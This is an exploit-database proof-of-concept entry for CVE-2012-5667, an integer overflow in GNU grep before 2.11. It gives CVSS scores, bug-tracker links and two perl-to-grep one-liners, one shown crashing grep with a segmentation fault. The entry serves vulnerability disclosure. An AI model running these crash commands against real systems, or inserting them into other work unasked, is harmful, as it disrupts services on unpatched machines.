Grep < 2.11 - Integer Overflow Crash (PoC)

2012-12-3100:00:00

Joshua Rogers

www.exploit-db.com

CVSS2

4.4

Attack Vector

LOCAL

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:L/AC:M/Au:N/C:P/I:P/A:P

AI Score

9.5

Confidence

High

EPSS

0.007

Percentile

80.7%

JSON

Grep <2.11 is vulnerable to int overflow exploitation.

http://lists.gnu.org/archive/html/bug-grep/2012-03/msg00007.html

Although it is patched in the recent Grep,
This update has not been pushed to the Ubuntu repos, or the Redhat
repos, leaving 99% of those OS's(and more) vulnerable.


There are also many other ways to do this bug.

It is low severity because it would be extremely hard to actually
exploit it, and it is a local exploit, and it is not run by root.

Found By: Security Researcher - Joshua Rogers


More:
https://bugzilla.redhat.com/show_bug.cgi?id=889935
https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473
http://seclists.org/oss-sec/2012/q4/504
etc.

#There are many ways of doing this.

#Method one:
$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
Segmentation fault (core dumped)


#Method two:
$ perl -e 'print "\nx"x(2**31)' | grep -c x > /dev/null


Twitter: https://twitter.com/MegaManSec


CVE: CVE-2012-5667
-- 
*Joshua Rogers* - Retro Game Collector && IT Security Specialist
gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg>